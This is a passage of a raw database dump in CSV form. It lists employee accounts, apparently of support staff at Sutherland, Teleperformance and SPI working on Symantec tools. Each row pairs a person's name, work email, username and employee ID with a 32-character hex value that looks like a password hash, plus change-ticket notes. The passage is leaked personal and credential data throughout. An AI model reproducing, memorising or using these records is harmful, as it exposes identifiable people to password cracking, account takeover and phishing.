LL,NULL
c8-4a3d-8b0c-b83387ff500c,<blank>,<blank>,Jijo_T@SUTH.COM,Sutherland,67e15d3cf82
5ea8f699e0c4d3f39c714,P,<blank>,Jijo_P_T,Jijo,NULL,NULL,NULL
28f4-429c-b801-e1c15060d6d4,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
716115,9892c746c23c5c57f7a5536b9fd0b476,Huesca,<blank>,227434,DexterLouieJay ,NU
LL,NULL,NULL
4cf-4a5b-9b43-e7d61b1e7864,<blank>,86349,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",72cb79beb107d38bf4ec25021c1cb568,Syed,<blank>,zehra_syed,
Zehra,NULL,NULL,NULL
e7a-4a8a-ac22-30d8491dea8d,<blank>,78550,accounts@symantec.teleperformance.gr,TP
G,79a1536074dd7d2bfec797a8b57c1546,Kosidlo,<blank>,ewa_kosidlo,Ewa,NULL,NULL,NUL
L
1f-4a2c-9963-57f56f929ff0,<blank>,<blank>,Jinu_Joseph@SUTH.COM,Sutherland,441a02
670cc92ef774359d135d9c0637,Joseph,<blank>,Jinu_Joseph,Jinu,NULL,NULL,NULL
0c-4ffd-b331-52a9102756ac,<blank>,<blank>,Jishnu_TV@SUTH.COM,Sutherland,9d1435e3
0d907687b8ad19c9f0dbf950,T,<blank>,Jishnu_T_V,Jishnu,NULL,NULL,NULL
b3-4dc8-b16f-6d242d54c6eb,<blank>,<blank>,Jitendra_Amangi@SUTH.COM,Sutherland,61
c2facb4b37b7ff373e94571482a80e,Vasant,<blank>,Jitendra_Vasant_Amangi,Jitendra,NU
LL,NULL,NULL
f8cb-4f43-a379-9c33e22ccf18,PM - 8/8/2011,<blank>,tools_id@symantec.suth.com,<bl
ank>,27951f2ad8a925e51f5ef1b894a870fe,Velayudam,<blank>,119327,Asha Jyothi,NULL,
NULL,NULL
ae-4a41-89aa-ac4ba7612a1e,<blank>,<blank>,Jithin_Abraham@SUTH.COM,Sutherland,896
e1acaf8edc39a6255bbfa2cb71391,J,<blank>,Jithin_J_Abraham,Jithin,NULL,NULL,NULL
44-47a8-a5df-488d10d13ca3,<blank>,2633288,tools_id@symantec.suth.com,Sutherland,
048d21557aad7ab109771157b55ffef8,Monteiro,<blank>,Johnson_Monteiro,Johnson,NULL,
NULL,NULL
18-43fe-bb71-8f974ccafe25,<blank>,<blank>,johnsy_quadras@suth.com,Sutherland,193
0a70194c4a602c579c2baeab97cf3,Bonaventure,<blank>,Johnsy_Bonaventure_Quadras,Joh
nsy,NULL,NULL,NULL
9b-4b06-b6bb-0b89ac2eda1d,<blank>,<blank>,Jolly_DSouza@SUTH.COM,Sutherland,df2a8
e0c778553d81c96654f224fe837,DSouza,<blank>,Jolly_DSouza,Jolly,NULL,NULL,NULL
d31d-4ef7-8a6c-4a4a28e2e787,<blank>,<blank>,liesbeth.harmsen@teleperformance.nl,
PM - 8/16/2012 - CRQ000000770690,8c06c832baddd06e18562c850ac33a1b,Harmsen,<blank
>,229120,Liesbeth,NULL,NULL,NULL
64-4dc4-8a01-c3d46329042f,<blank>,<blank>,Jonas_Gonsalves@SUTH.COM,Sutherland,0e
24781432f8df0d93228386cd4ff0de,Gonsalves,<blank>,Jonas_Gonsalves,Jonas,NULL,NULL
,NULL
92-4203-933e-535a7dd56b44,<blank>,<blank>,JoseGauravSelvam_Kagoo@SUTH.COM,Suther
land,887cab062eb341925e8afe60ee373cbc,Gaurav,<blank>,Jose_Gaurav_Selvam_Kagoo,Jo
se,NULL,NULL,NULL
1e-4e5d-b87e-59faa3bff5a1,<blank>,<blank>,RVJoseph@suth.com,Sutherland,a7f041737
bc459bc5b2eff935f18225a,Valantine,<blank>,Joseph_Valantine_Rodrigues,Joseph,NULL
,NULL,NULL
97f7-477d-a6ed-3ffd0cf00951,"CRQ000000730985 CLNP July 16,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,951db616f5fd3a9ec72576f260ee637d,Udyawar,<bla
nk>,224606,Yogita,NULL,NULL,NULL
eb-4a1c-9c3b-724e35649546,<blank>,<blank>,Juby_Joseph@SUTH.COM,Sutherland,b125be
c46ac8e6544ad1119a23288302,Joseph,<blank>,Juby_Joseph,Juby,NULL,NULL,NULL
a8-4369-b178-c33bf3a3b829,<blank>,<blank>,JudiAriotNirmala_P@SUTH.COM,Sutherland
,edf67fd98455680548e674bf9b2f71fd,Ariot,<blank>,Judi_Ariot_Nirmala_P,Judi,NULL,N
ULL,NULL
bb-48fb-a3f7-bcdddf7e943c,<blank>,<blank>,JumanaKitabi_Y@SUTH.COM,Sutherland,750
2db2154d938437d6e0ec8267d656e,Kitabi,<blank>,Jumana_Kitabi_Y,Jumana,NULL,NULL,NU
LL
14-47b6-b401-03ad3da87640,<blank>,<blank>,Tools_id@symantec.suth.com,Sutherland,
94e64cbb5739a9a0e069e799a3822c98,Premraj,<blank>,Justin_Premraj_Deivasagayam,Jus
tin,NULL,NULL,NULL
dd-45ac-9d20-3ae166721396,<blank>,<blank>,Jyothi_Bhaskar@SUTH.COM,Sutherland,336
2f04cf30bb1a6a20fd8a3579c7b72,Bhaskar,<blank>,Jyothi_Bhaskar,Jyothi,NULL,NULL,NU
LL
bf-4f52-9e76-5b6c0971f9cd,<blank>,<blank>,KalaiSelvi_E@SUTH.COM,Sutherland,0d44a
b72bf11d165c6706c453b9f7690,Selvi,<blank>,Kalai_Selvi_E,Kalai,NULL,NULL,NULL
9835-42cd-8b81-a06ce7ff9c24,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
734351 - PR - 17th July 2012,b0f2d850dd84104ce2eba86aa8bed887,Alfonso Ular,<blan
k>,228057,Cherrylyn ,NULL,NULL,NULL
a2-4ecb-bcce-7ff09e085b6f,<blank>,<blank>,Kameshwaran_G@SUTH.COM,Sutherland,0353
ae7537ac4d70aff57e40de6a3e37,G,<blank>,Kameshwaran_G,Kameshwaran,NULL,NULL,NULL
d7-4b12-a458-c507053b7eae,<blank>,<blank>,DVKaran@suth.com,Sutherland,6b4a9a8fd0
d630d6246696ae245d99c1,Vinodrai,<blank>,Karan_Vinodrai_Desai,Karan,NULL,NULL,NUL
L
e7-458b-975c-8c0effb99527,<blank>,<blank>,KartheekSanka_NVM@SUTH.COM,Sutherland,
06f87c50fbd516709d015207dd24bfb2,Sanka,<blank>,Kartheek_Sanka_N_V_M,Kartheek,NUL
L,NULL,NULL
d6-4e3d-8f16-cda139aff208,<blank>,<blank>,Karthi_Raja@suth.com,Sutherland,eb6831
9bc7b1df63fca9eec3bd8bb0a0,Raja,<blank>,Karthi_Raja,Karthi,NULL,NULL,NULL
9792-43ac-aa42-a4bc98e0eca3,"CRQ000000341039-RJ-Sep 20, 2011",000-0000,khalil_mu
nshi1@SUTH.COM,Sutherland,2093cc781935688ad3a43621db4d6cf2,Munshi,<blank>,117119
,Khalil,NULL,NULL,NULL
551b-4a24-9b3a-309df82ad35d,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,09f766b92d4a5b831be518f733725dbe,Sundararajan,<blank>,075334,Sudharsan,NU
LL,NULL,NULL
d3-4c5e-b7cc-03acd22f40d7,<blank>,<blank>,Karthick_S2@suth.com,Sutherland,fd3539
fa49ff2f4dfe6c38e3902ae4f8,Subbiah,<blank>,Karthick_Subbiah,Karthick,NULL,NULL,N
ULL
e7-437d-bf1e-d2e4b0d893c8,<blank>,<blank>,Karthickeyan_V@SUTH.COM,Sutherland,2f6
1911f0048928470384ae4bdb705ba,V,<blank>,Karthickeyan_V,Karthickeyan,NULL,NULL,NU
LL
5ccb-4a1b-af4f-c6d9a4a2bc74,CRQ000000641908--vmd--27/04/2012,000-000,subodh_naik
@suth.com,Sutherland,00977816aa03f05ddd7cbd6ea0a10bdb,Naik,<blank>,224250,Subodh
,NULL,NULL,NULL
49db-4314-bb62-9aa0c15290a2,<blank>,<blank>,tools_id@symantec.suth.com,PM - 4/30
/2012 - CRQ000000642972,3c3066fe6cb595cba10c58912899502b,Ramachandran,<blank>,09
5043,Mahendrakumar,NULL,NULL,NULL
16-49f8-b071-2d23fe0dcf8f,<blank>,<blank>,Karthik_SP@SUTH.COM,Sutherland,cd341af
ec1d2f0d2741bd5d4660a60c6,S,<blank>,Karthik_S_P,Karthik,NULL,NULL,NULL
f0-4ed1-80dc-7780d47d3620,<blank>,<blank>,KarthikaPillai_Janardhanan@suth.com,Su
therland,12a305f8dac3e6956a3ea553eec550a2,Janardhanan,<blank>,Karthika_Janardhan
an_Pillai,Karthika,NULL,NULL,NULL
f7-486d-838f-37ff42b62720,<blank>,<blank>,Karthika_S@SUTH.COM,Sutherland,9b1f471
5e541fa2030b61430f46d2112,S,<blank>,Karthika_S,Karthika,NULL,NULL,NULL
ca-413f-8ca6-9985a8f8adf9,<blank>,<blank>,Karthikeyan_Bagyalingam@suth.com,Suthe
rland,dc4b85aa1fb4fb19ffa8c82cd2b78f79,Bagyalingam,<blank>,Karthikeyan_Bagyaling
am,Karthikeyan,NULL,NULL,NULL
999-4fef-b35e-c5a75fcefdf8,<blank>,<blank>,KrishnaPriyadarshini_K@SUTH.COM,Suthe
rland,b184be5b6dd47eb1e46beec0e5d8e5ca,Priyadarshini,<blank>,Krishna_Priyadarshi
ni_K,Krishna,NULL,NULL,NULL
10-4e45-be19-dd5b7b793b4a,<blank>,<blank>,KannanM_S@SUTH.COM,Sutherland,5e1b0274
3396eda3ff83e2de2407fb69,M,<blank>,Kannan_M_S,Kannan,NULL,NULL,NULL
fd-452c-9d40-e2387a24a2ee,<blank>,<blank>,Kannan_SG@SUTH.COM,Sutherland,f3f78f0c
006d956bfc8f63c63c3da37d,S,<blank>,Kannan_S_G,Kannan,NULL,NULL,NULL
ae-49cd-b223-adb9bc650313,<blank>,<blank>,KanthiKiran_V@SUTH.COM,Sutherland,fa16
5a0248ed3c65756ca265d575572d,Kiran,<blank>,Kanthi_Kiran_V,Kanthi,NULL,NULL,NULL
e2-4bd2-8874-2058cb650d72,<blank>,<blank>,Karishma_Roy@SUTH.COM,Sutherland,bc741
1b7a02ed7c03df2dcddb3d40638,Roy,<blank>,Karishma_Roy,Karishma,NULL,NULL,NULL
f798-4d65-b22c-02393b95695c,CRQ000000346804-CLNP-28/09/2011,000-0000,tools_id@sy
mantec.suth.com,Sutherland,c2c2988bb54dbf3cf48b210852559cd0,F,<blank>,120920,Kar
an Nirmala,NULL,NULL,NULL
6fb2-4f07-b8ed-304194f04697,CRQ000000641919--vmd--27/04/2012,000-000,junaid_shai
kh@suth.com,Sutherland,9fca0aeea48101ad3c154508c18da862,Shaikh,<blank>,224252,Ju
naid,NULL,NULL,NULL
d679-43c9-944c-55356e09f797,CRQ000000346833 SP 28 Sep 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,26e6cedf6d46313237f896fe33b52055,R,<blank>,120931,Loke
shwar,NULL,NULL,NULL
4d-41ce-90dd-081c2b4aec7b,<blank>,<blank>,Karthikeyan_MP@SUTH.COM,Sutherland,1f1
16bc713a8f98b0e98f70bd9ebfb75,M,<blank>,Karthikeyan_M_P,Karthikeyan,NULL,NULL,NU
LL
3d80-4676-bbd5-e0049635893b,CRQ000000200411 -KD-11-2-2011,<blank>,Aravindan_R@sy
mantec.com,Symantec,160803a4cd09447e280a0317fa66e673,R,<blank>,112259,Aravindan,
NULL,NULL,NULL
e255-44a4-9d33-e763990716c1,CRQ000000200411 -KD-11-2-2011,<blank>,Jones_Victor_J
@symantec.com,Symantec,f179ab6fbada5ebb22105f9ceadc9f70,Victor J,<blank>,112374,
Jones ,NULL,NULL,NULL
2a11-4133-addf-35d42a8e30b1,CRQ000000513235--VMD--19/01/2012,000-000,tools_id@sy
mantec.suth.com,SUTHERLAND,ba1f16004a89d8214f03e154b5923c75,Montecalvo,<blank>,1
23676,Jeevan,NULL,NULL,NULL
d982-4186-9bd2-e154eaa3b23e,CRQ000000653450 SP 8 May 2012,000-0000,badrinarayana
n_gopal@symantec.suth.com,Sutherland,c9b4cb404297b70498e5c62336f1b100,Gopal,<bla
nk>,224422,Badrinarayanan,NULL,NULL,NULL
0b-4a39-b044-a29e3b0b7537,<blank>,<blank>,KhajaMohideen_AS@SUTH.COM,Sutherland,6
1830987f8e08646033665a56ba7916f,Mohideen,<blank>,Khaja_Mohideen_Shahul_Hameed,Kh
aja,NULL,NULL,NULL
23-46cc-98b1-8121d9b68022,<blank>,2633282,tools_id@symantec.suth.com,Sutherland,
1fa58567d67139636044229c563f7322,Mohd.,<blank>,Khalil_Mohd._Ishaque_Munshi,Khali
l,NULL,NULL,NULL
569e-4768-8a96-ffec7fb072f9,CRQ000000653459 SP 8 May 2012,000-0000,sarath_chandr
an@symantec.suth.com,Sutherland,bf78298f5f95ac92a769ea8a8723c16c,Chandran,<blank
>,224425,Sarath,NULL,NULL,NULL
d1-4125-9f68-2e873dca0f3e,<blank>,<blank>,Kiran_Patole@SUTH.COM,Sutherland,3dd29
f4384ded364a061c943320cb078,Avdhut,<blank>,Kiran_Avdhut_Patole,Kiran,NULL,NULL,N
ULL
32-445a-9529-afd2dab79af7,<blank>,<blank>,Kiran_Ubhe@SUTH.COM,Sutherland,8d6cb89
a88c980eb4c4f32c2e5819ec5,Kisan,<blank>,Kiran_Kisan_Ubhe,Kiran,NULL,NULL,NULL
c5-44a6-935f-15e0267bd403,<blank>,<blank>,KiranKumarVarma_M@SUTH.COM,Sutherland,
746fbf095cf6a3ba8dcc5531c4929096,Kumar,<blank>,Kiran_Kumar_Varma_M,Kiran,NULL,NU
LL,NULL
61-40ce-bb5f-b904e42dab3f,<blank>,<blank>,KiranMai_RS@SUTH.COM,Sutherland,dbccec
ed1d5ea24c8cb70ef5a322d155,Mai,<blank>,Kiran_Mai_R_S,Kiran,NULL,NULL,NULL
0c-4f45-933f-28d483b8f41c,<blank>,<blank>,Kiranjith_MV@SUTH.COM,Sutherland,302c9
23d72c55c6b1e85818d75704283,M,<blank>,Kiranjith_M_V,Kiranjith,NULL,NULL,NULL
12b-49e2-9818-b366503b6f8b,<blank>,<blank>,PKoushik@suth.com,Sutherland,1790c2aa
06f906d2d682e25c55164374,Paul,<blank>,Koushik_Paul,Koushik,NULL,NULL,NULL
6f5-4734-bb36-a26a694e057b,<blank>,<blank>,kranthi_yerravalli@suth.com,Sutherlan
d,797cab17c52384d20753cd2206f5008e,Kumar,<blank>,Kranthi_Kumar_Reddy_Yerravalli,
Kranthi,NULL,NULL,NULL
935-4948-aaa6-a7066d6a7edf,<blank>,<blank>,Kripashankar_Yadav@SUTH.COM,Sutherlan
d,70959a6b292c21074eed57a0165cfb04,Yadav,<blank>,Kripashankar_Yadav,Kripashankar
,NULL,NULL,NULL
e87-46f5-b5e9-7455d241f492,<blank>,<blank>,Kumaran_S@SUTH.COM,Sutherland,da60807
05eac0db0bc7493f2521f2156,Siva,<blank>,Kumaran_Siva_Kumar,Kumaran,NULL,NULL,NULL
f6a-412c-aace-b5c7672146ea,<blank>,<blank>,Kunjumon_Majeed@SUTH.COM,Sutherland,4
fa5a1adfa7760147aae965bc38baeaf,Majeed,<blank>,Kunjumon_Majeed,Kunjumon,NULL,NUL
L,NULL
5f8-4dc5-91df-227e1674f2d8,<blank>,<blank>,Lakshmi_KB@SUTH.COM,Sutherland,9a6e1d
cbf8e8d16b6280ec875844dd5a,K,<blank>,Lakshmi_K_B,Lakshmi,NULL,NULL,NULL
a9f-433e-b152-f993ef736b5a,<blank>,<blank>,Lakshmi_M3@SUTH.COM,Sutherland,2577e7
52f6a3ae85c0243b537b3bb0e1,M,<blank>,Lakshmi_M,Lakshmi,NULL,NULL,NULL
940-473e-a670-776ed82a9ef9,<blank>,<blank>,Lakshmi_N@SUTH.COM,Sutherland,f769e0b
aff2e087eb9d288ccedd42ab7,N,<blank>,Lakshmi_N,Lakshmi,NULL,NULL,NULL
5f6-4a03-a24b-a85477d91d47,<blank>,<blank>,Lakshminarayanan_R@SUTH.COM,Sutherlan
d,3b24a57437dc07ffd6d21e49741008f3,R,<blank>,Lakshminarayanan_R,Lakshminarayanan
,NULL,NULL,NULL
ef5-4c86-866d-f8d8e08201d3,<blank>,<blank>,Lakshmi_Sivasubramaniam@suth.com,Suth
erland,6ffc8683480d3aa3e1d53e45f3801653,Sivasubramaniyam,<blank>,Lakshmipriya_Si
vasubramaniyam,Lakshmipriya,NULL,NULL,NULL
49d-4850-bd1d-5eb45e4181ef,<blank>,<blank>,Lalit_Khamkar@SUTH.COM,Sutherland,260
f410216fdc190cfb2d05b8e811325,Mohan,<blank>,Lalit_Mohan_Khamkar,Lalit,NULL,NULL,
NULL
ec8-412f-950f-6c44a97e2158,<blank>,2633251,tools_id@symantec.suth.com,Sutherland
,53fd4e0137eae771dea690e3ef780197,Poonamchand,<blank>,Lalit_Poonamchand_Choudhar
y,Lalit,NULL,NULL,NULL
3b0-4e3a-8284-5e0dee7eb594,<blank>,<blank>,Lalit_Prabhu@suth.com,Sutherland,e896
d82a83d09850f7e1599f78c8e977,Subhash,<blank>,Lalit_Subhash_Prabhu_Ajgaonkar,Lali
t,NULL,NULL,NULL
6ac7-4e9d-ab93-65874d060042,"CRQ000000341039-RJ-Sep 20, 2011",000-0000,jitendra_
mishra1@SUTH.COM,Sutherland,9d5cc71e1da75cd0a7783f1679faf70f,Mishra,<blank>,1170
95,Jitendra,NULL,NULL,NULL
4a6b-4747-94ab-7e9f179e3b95,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
607042 - PR - 27th March 2012,08802b420af4f073133f3242061d80a4,sanil,<blank>,223
123,sunil,NULL,NULL,NULL
cb4-4aa2-8c50-01db69901d6e,<blank>,<blank>,Lavina_DSouza@SUTH.COM,Sutherland,779
146d9478b727b393a9e9b36312cd2,Denis,<blank>,Lavina_Denis_DSouza,Lavina,NULL,NULL
,NULL
bcb-40b1-aed9-2869cc4e48c8,<blank>,<blank>,Lawrence_Jacob@SUTH.COM,Sutherland,dc
7ec9cfba387466d405746ddd679c77,Jacob,<blank>,Lawrence_Jacob,Lawrence,NULL,NULL,N
ULL
1e1-4dae-8605-ac8b71c5d004,<blank>,<blank>,LawrenceSebastinArun_A@SUTH.COM,Suthe
rland,25b7552cdd8446983e9fa5bf5c2d8ef8,Sebastin,<blank>,Lawrence_Sebastin_Arun_A
,Lawrence,NULL,NULL,NULL
cc05-4388-8320-351b93518728,CRQ000000622740 SP 10 April 2012,999-999-9999,Balakr
ishna_Prasad@symantec.suth.com,Sutherland,feea6e0c57d7642d0e489b9c6eab13c0,Prasa
d,<blank>,223555,Balakrishna,NULL,NULL,NULL
1ad-463e-86be-60501bf5c209,<blank>,<blank>,Laxmi_Panicker@SUTH.COM,Sutherland,eb
4298dc41e87653ba70d585a15821e9,Ramachandran,<blank>,Laxmi_Ramachandran_Panicker,
Laxmi,NULL,NULL,NULL
246-4534-90ed-213574ac2dea,<blank>,<blank>,Leeladar_Amin@suth.com,Sutherland,2b1
7a31c9a14afa4cff7cb7a109ba8e9,Loknath,<blank>,Leeladar_Loknath_Amin,Leeladar,NUL
L,NULL,NULL
983-4737-a3d0-68324363963d,<blank>,<blank>,Leo_Thomas@SUTH.COM,Sutherland,76b716
22f027f076de8d2f1d089c7274,Thomas,<blank>,Leo_Thomas,Leo,NULL,NULL,NULL
c07-4826-b157-f352c89b0a5e,<blank>,<blank>,Leslie_Stephen@SUTH.COM,Sutherland,c3
eacaba1dd185e57c53381bf2ab5196,Thomas,<blank>,Leslie_Thomas_Stephen,Leslie,NULL,
NULL,NULL
571-4eca-8730-03df1cb618f0,<blank>,<blank>,Ligil_John@SUTH.COM,Sutherland,9d343f
63a8253eba81fd44ce1c1ef3bf,P,<blank>,Ligil_P_John,Ligil,NULL,NULL,NULL
6fb-4a00-b2df-8a035d2e3efc,<blank>,<blank>,Magesh_K@SUTH.COM,Sutherland,704ad1c0
a0b0734d49c1f3136027a9bb,K,<blank>,Magesh_K,Magesh,NULL,NULL,NULL
e746-40bd-8b7b-f07c0a45589a,CRQ000000430301-CLNP-30 Nov 2011,000-0000,andres.ben
itez@teleperformance.com.ar,Teleperformance,eeb66643c238bcb6fcd95598536ed0f6,Ben
itez,<blank>,122802,Andres Fernando,NULL,NULL,NULL
474-40b5-bdcf-828cdf79e617,WS 19-07-2010,INC213497,Mahafrin_Katila@suth.com,Suth
erland,67ba78df1e9cba2841269bd19fe9713a,Pervez,<blank>,Mahafrin_Pervez_Katila,Ma
hafrin,NULL,NULL,NULL
7ef1-4e33-a371-252b53ee4343,<blank>,<blank>,evangelia_kyriakidou@teleperformance
.com,CT - 08/06/2012 - CRQ000000687730,39afede48fc32b761eaf73ace538ab52,Kyriakid
ou,<blank>,226431,Evangelia,NULL,NULL,NULL
943b-4ee8-9706-16c2c01b99de,<blank>,<blank>,Joannamarie_Belen@SPI.COM,PM - 6/14/
2012 - CRQ000000694438,c0144259e40cb5a8f70b6b359c7f1c74,Belen yarra,<blank>,2267
01,Joanna Marie,NULL,NULL,NULL
2345-42de-b2b9-bd83d4af762a,<blank>,<blank>,Marianeliaariane_Ong@SPI.COM,PM - 6/
14/2012 - CRQ000000694478,f7eb498e6a45a352940d651681b45b05,Ong,<blank>,226711,Ma
ria Nelia Ariane,NULL,NULL,NULL
07b-4f7f-9a34-79777fe66d7c,<blank>,<blank>,VJManan@suth.com,Sutherland,4d20dddc0
f954b0ae370ab6526df7897,Jatinkumar,<blank>,Manan_Jatinkumar_Vaidya,Manan,NULL,NU
LL,NULL
343-42d1-99ee-13e1a556da40,<blank>,<blank>,Maneesh_KU@SUTH.COM,Sutherland,58304c
5d690357d1a47c6a692ceef798,K,<blank>,Maneesh_K_U,Maneesh,NULL,NULL,NULL
37d-4198-a234-b2015172224d,<blank>,<blank>,Mani_Gangadharan@SUTH.COM,Sutherland,
5d616400f97194903c2401a280e4c345,Gangadharan,<blank>,Mani_Gangadharan,Mani,NULL,
NULL,NULL
9ee-41a0-9c17-a3041feeb919,<blank>,<blank>,Manikandan_MS@SUTH.COM,Sutherland,560
5c4e614d68b3f498f0a073fda4cb7,M,<blank>,Manikandan_M_S,Manikandan,NULL,NULL,NULL
43b-47e4-9724-d7060b41d984,<blank>,<blank>,Lakshmi_Menon@SUTH.COM,Sutherland,42d
98a9c8eedb723569f0e9dd5ec990d,R,<blank>,Lakshmi_R_Menon,Lakshmi,NULL,NULL,NULL
b779-4acf-844c-ec1b6e7db124,sms 29,INC182175,tools_id@symantec.suth.com,Sutherla
nd,e1c7d22186389d09934cd9cbc27d80f7,Antones,<blank>,093642,Avelina,NULL,NULL,NUL
L
53f-4206-9ab8-d81d5ccfcc39,<blank>,<blank>,Lasya_MNV@SUTH.COM,Sutherland,4bd29d7
f03634aa9732816584e3e15f6,M,<blank>,Lasya_M_N_V,Lasya,NULL,NULL,NULL
f88-4860-836a-4c390daaf27b,<blank>,<blank>,Lavin_Kunnathupurayil@SUTH.COM,Suther
land,d93e365a517687e1544e33666f5bfa32,Mukundan,<blank>,Lavin_Mukundan_Kunnathupu
rayil,Lavin,NULL,NULL,NULL
21bb-4785-9583-6531f150aa4f,<blank>,<blank>,Joseph_Milla@SPI.COM,PM - 6/14/2012
- CRQ000000694467,ab84720f50ef6b9007eb33e65567d857,Milla,<blank>,226709,Joseph,N
ULL,NULL,NULL
51c-46de-b31f-21913245f324,<blank>,<blank>,Leen_Sagayaraj@suth.com,Sutherland,f4
d3b9927f34a7d85fba7725da9e120e,Sagayaraj,<blank>,Leen_Sagayaraj_Jaya_Prakash,Lee
n,NULL,NULL,NULL
52b-4851-8edc-f0d690bd7c1c,<blank>,<blank>,Leera_Raju@SUTH.COM,Sutherland,d2fbe2
8b07b7dcc1c96ab1c6fe8d2e2f,Raju,<blank>,Leera_Raju,Leera,NULL,NULL,NULL
5fc-4414-9b88-e8df7d7b7550,<blank>,<blank>,Leka_NP@SUTH.COM,Sutherland,3378dc48d
69b97779c3fa5bfb043d8e6,N,<blank>,Leka_N_P,Leka,NULL,NULL,NULL
903-49e9-9e2b-daba42ee2105,<blank>,<blank>,Lekha_L@SUTH.COM,Sutherland,8421046a3
054303e6c966b62440c2c72,Rani,<blank>,Lekha_Rani_L,Lekha,NULL,NULL,NULL
26c-43c8-9f6f-ddd22aeb02e2,<blank>,<blank>,Lekshmi_RS@SUTH.COM,Sutherland,ff63fd
eb52576c9e490e76e4ecb6032a,R,<blank>,Lekshmi_R_S,Lekshmi,NULL,NULL,NULL
a214-4bcd-8470-85c18ff272b4,bpr-28-05-10,INC182175,tools_id@symantec.suth.com,su
therland,123cd8dffb1cf1c89969b92d2014bbbc,Shipe,<blank>,103384,Greg,NULL,NULL,NU
LL
426-4043-8734-050e39a2dc64,<blank>,<blank>,Leodwin_Livero@SUTH.COM,Sutherland,b5
f5ec2e8b7d1f1f5e3404695268a8f5,Livero,<blank>,Leodwin_Livero,Leodwin,NULL,NULL,N
ULL
e6bf-4eb7-9632-a9387964d2a9,CRQ000000753775--vmd--01/08/2012,<blank>,atyler@syma
ntec.teleperformance.gr,Teleperformance,d55373ba9df9da73ff9164062c8572dc,Tyler,<
blank>,228613,Amelie,NULL,NULL,NULL
68c-4ca0-a013-dee9da286187,<blank>,<blank>,Leonne_Mcevans@suth.com,Sutherland,20
c600d854c6457d12dd8e2bb8d0d06e,Elizabeth,<blank>,Leonne_Elizabeth_Mcevans,Leonne
,NULL,NULL,NULL
db6-40de-b33b-61ae6f0304a8,<blank>,<blank>,Leroy_Cabral@SUTH.COM,Sutherland,5b52
221e527c5e56c6f8fa74aecb5ea7,Claude,<blank>,Leroy_Claude_Cabral,Leroy,NULL,NULL,
NULL
a96-4683-86a6-b81e0552cd7e,<blank>,<blank>,Libu_Bhaskar@SUTH.COM,Sutherland,560a
513b65b2eee794214951e2cc96a5,Bhaskar,<blank>,Libu_Bhaskar,Libu,NULL,NULL,NULL
3d5-4476-b9da-df1fce7f7f57,<blank>,<blank>,Lijo_K@SUTH.COM,Sutherland,e110e1538d
812c961093902e3cba8124,K,<blank>,Lijo_K,Lijo,NULL,NULL,NULL
78c-4f94-b509-f2d840296e3d,<blank>,<blank>,Lubna_Ambreen@SUTH.COM,Sutherland,ed4
f9ddab53a8f2d32fef8a7fef60753,Ambreen,<blank>,Lubna_Ambreen,Lubna,NULL,NULL,NULL
979-45df-8eb3-ec7c95dc8ad3,<blank>,<blank>,MSyed_Ravoof@SUTH.COM,Sutherland,02f4
bfa9482bc680e0b3f7dc2c0db25b,Syed,<blank>,M_Syed_Abdul_Ravoof,M,NULL,NULL,NULL
0a43-4c87-a29f-0a2ff820a18c,<blank>,<blank>,israel_efondo@SPI.COM,PM - 8/28/2012
- CRQ000000783690,852726a5b212d985f2cf690922a7b56e,Efondo,<blank>,229455,Israel
,NULL,NULL,NULL
148-4e4f-a947-d8bc2584e858,<blank>,<blank>,Madhana_M@SUTH.COM,Sutherland,2f9f256
0005ff01f0cddfb6fb0738165,M,<blank>,Madhana_M,Madhana,NULL,NULL,NULL
5c0-42b4-a652-1bac31fc314f,<blank>,<blank>,Madhu_Sahu@SUTH.COM,Sutherland,6e4c94
6b7e58b0dd359d3243836da9ef,Smitha,<blank>,Madhu_Smitha_Sahu,Madhu,NULL,NULL,NULL
77ae-4aa4-ac18-297ebdc8e0e1,<blank>,<blank>,philipkarl_lucilo@SPI.COM,PM - 8/28/
2012 - CRQ000000783693,afc64bd55eebd87920a5e2b9af969ed9,Lucilo,<blank>,229456,Ph
ilip Karl,NULL,NULL,NULL
7f3-46dc-935d-2b1daffc826e,<blank>,<blank>,Manikandan_Subburayalu@suth.com,Suthe
rland,b46eed586a71a431f6debc3b2fee2093,Subburayalu,<blank>,Manikandan_Subburayal
u_N,Manikandan,NULL,NULL,NULL
a59-4301-96de-cdc9c8ec244a,<blank>,<blank>,Manu_Vasu@SUTH.COM,Sutherland,10392c4
514e734a607f5abdf5df055f2,Vasu,<blank>,Manu_Vasu,Manu,NULL,NULL,NULL
e7a-4a1d-9618-e9de8d21a162,<blank>,<blank>,MariaLinda_Lawrance@SUTH.COM,Sutherla
nd,3e0d99c005cf9d775e56611b01fbfc60,Linda,<blank>,Maria_Linda_Lawrance,Maria,NUL
L,NULL,NULL
e25-492b-8f33-49810cefe307,<blank>,<blank>,Mark_Hickey@suth.com,Sutherland,aadd0
d9ec05472cf205d07deab044053,Joseph,<blank>,Mark_Joseph_Hickey,Mark,NULL,NULL,NUL
L
48d-4491-8052-8f30528bbf95,<blank>,075815/2633282,Tools_id@symantec.suth.com,Sut
herland,17914940adec00db8bda251248299f87,Suresh,<blank>,Meghana_Suresh_Kulkarni,
Meghana,NULL,NULL,NULL
225-45cb-b935-f8b257338832,<blank>,<blank>,LeenaRani_K@SUTH.COM,Sutherland,e939c
7bd41543ceadafe25e0b6f0b314,Rani,<blank>,Leena_Rani_K,Leena,NULL,NULL,NULL
d6d-47cf-9098-703d9d7ed6dd,<blank>,<blank>,Lekshmi_Narayanan@SUTH.COM,Sutherland
,c494d8f7cbdfc10396c5f580c0b981b0,Narayanan,<blank>,Lekshmi_Narayanan,Lekshmi,NU
LL,NULL,NULL
e30-4255-b55d-b446939dc611,<blank>,<blank>,LindaAnjilikattu_Joseph@SUTH.COM,Suth
erland,a870246bb9daaf8b7e985b677c592024,Anjilikattu,<blank>,Linda_Anjilikattu_Jo
seph,Linda,NULL,NULL,NULL
7f2-4e1e-b5c6-4655ec5ed832,<blank>,<blank>,Lloyd_Dsouza@SUTH.COM,Sutherland,f4f2
35bf05db4b4f5d32fae661a35c55,Dsouza,<blank>,Lloyd_Dsouza,Lloyd,NULL,NULL,NULL
1a6-4b9f-acec-835c2118f72c,<blank>,<blank>,Lokabiraman_Kalyanasundaram@suth.com,
Sutherland,4bb354020816d2a70331dbfcc67f7c58,Kalyanasundaram,<blank>,Lokabiraman_
